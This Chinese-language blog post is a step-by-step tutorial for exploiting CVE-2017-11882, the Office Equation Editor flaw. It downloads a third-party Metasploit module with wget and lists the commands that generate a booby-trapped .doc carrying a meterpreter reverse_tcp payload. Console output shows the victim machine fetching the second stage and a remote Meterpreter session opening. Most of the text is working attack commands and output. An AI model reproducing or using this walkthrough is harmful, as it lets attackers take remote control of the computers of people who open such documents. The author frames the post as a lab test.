cve-2017-11882漏洞利用

概述

这是一个潜伏了17年之久的远程代码执行漏洞,这个漏洞影响了目前所有的流行office软件,原理是利用了office的一个EQNEDT32.EXE组件,就是公式编辑器组件,详细的你可以看freebuf的这篇文章 打开文档变肉鸡:潜伏17年的“噩梦公式”Office漏洞攻击分析 我们现在说攻击

操作

首先下载metasploit的攻击模块 wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb 之后移动到下面这个目录 mv office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat 接着启动metasploit 输入 use exploit/windows/fileformat/office_ms17_11882

接着看一下设置选项

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
msf exploit(office_ms17_11882) > show options

Module options (exploit/windows/fileformat/office_ms17_11882):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME                   yes       Filename to save as
   SRVHOST   0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

设置生成的文件名字 set filename bboysoul.doc 设置主机ip set lhost 192.168.1.102 开始攻击 exploit

1
2
3
4
5
6
7
msf exploit(office_ms17_11882) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.102:4444 
[*] Using URL: http://0.0.0.0:8080/xudLp3
[*] Local IP: http://192.168.1.102:8080/xudLp3
[*] Server started.

之后当前目录下会生成一个叫bboysoul.doc的文件,我们在受害者机器下打开就好 注意我使用的是office201064位专业版,机器是windows764位 经过测试32位的windows和office是不能用的 接着在受害者机器打开这个文件就好了

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
msf exploit(office_ms17_11882) > [*] 192.168.1.113    office_ms17_11882 - Handling initial request from 192.168.1.113
msf exploit(office_ms17_11882) > [*] 192.168.1.113    office_ms17_11882 - Stage two requested, sending...
msf exploit(office_ms17_11882) > [*] Sending stage (205379 bytes) to 192.168.1.113
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.113:49225) at 2017-11-25 05:31:10 -0500

msf exploit(office_ms17_11882) > sessions

Active sessions
===============

  Id  Type                     Information                                 Connection
  --  ----                     -----------                                 ----------
  1   meterpreter x64/windows  WIN-HK90RUM6L1B\bboysoul @ WIN-HK90RUM6L1B  192.168.1.102:4444 -> 192.168.1.113:49225 (192.168.1.113)

欢迎关注我的博客 www.bboy.app Have Fun